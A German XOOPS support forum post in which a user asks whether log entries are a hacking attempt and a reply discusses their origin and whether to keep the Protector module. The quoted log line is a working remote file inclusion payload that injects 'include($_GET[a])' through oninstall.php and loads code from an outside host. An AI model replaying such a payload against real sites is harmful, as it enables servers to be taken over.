MyXoops Forum

Forum - myXOOPS German Support

6 + 9 = ?  
Geben Sie das Ergebnis der Berechnung ein
Sie haben max. 10 Versuche.
 
* = Erforderlich

Aw:: Hacking Versuch?

Betreff: Aw:: Hacking Versuch?
von Muki am 17.06.2009 10:32:49

Zitat:

igor schrieb:
ich beobachte Seit geraumer Zeit massiv steigende Anfragen die ca so ausschauenhttp://www.domain.de//xoops_lib/modules/protector/oninstall.ph p?mydirname=a(){}include($_GET[a]);function
v&a=http://URL_ERSETZT.ac.jp/b1ttletX1.txt????
hängt das im Kausalem Zusammenhang mit der alten News zur Sicherheitslücke im Protector?


Was hier interessant wäre, ist der Versuch von wo aus das ganze gestattet wurde.
Dieses siehst Du an:
Zitat:
=http://URL_ERSETZT.ac.jp/

Ob diese Domain wirklich die Ursprungsdomain ist lässt sich schwer sagen, jedoch ist Japan kein rechtsfreier Raum.

Es gibt ja auch die Möglichkeit wenn diese Anfragen immer die gleichen sind den Anfragenden ein Ergebnis zu geben, jedoch mit anderem Inhalt als dem erhofften. Ein Angreifender Server muss immer um einen Angriff zu starten erst selbst mal "die Hosen herunterlassen" und wird hierdurch selbst angreifbar.

Zitat:

igor schrieb:
Gibt es eigentlich im Moment eine Empfelung ob man eine XOOPS Installation lieber mit oder ohne den Protector nutzen sollte?

Da ist man geteilter Meinung. Die einen verzichten darauf die anderen nicht. Da der Protector nun Bestandteil des neuen Xoops ist, wurde er auch eine Zusätzliche Angriffsquelle. Ob ihn sich jemand installiert oder nicht obliegt der Entscheidung des einzelnen.
Bei Installation von gewarteten Modulen die nach wie vor immer wieder Aktualisiert werden, ist MEINE MEINUNG man kann auf Ihn verzichten.
Wie gesagt das ist meine persönliche Meinung.

Muki

Aktuell aus dem Forum

Forum Thema Antworten Views Letzter Beitrag
Modulentwicklung New Xoops Xcreate Module 0 4086 26.11.2025 15:22
efkan Gehe zum letzten Beitrag
Modulentwicklung XOOPS Custom Field Module 1 1557 24.11.2025 11:21
Goffy Gehe zum letzten Beitrag
Posts | Themen | Foren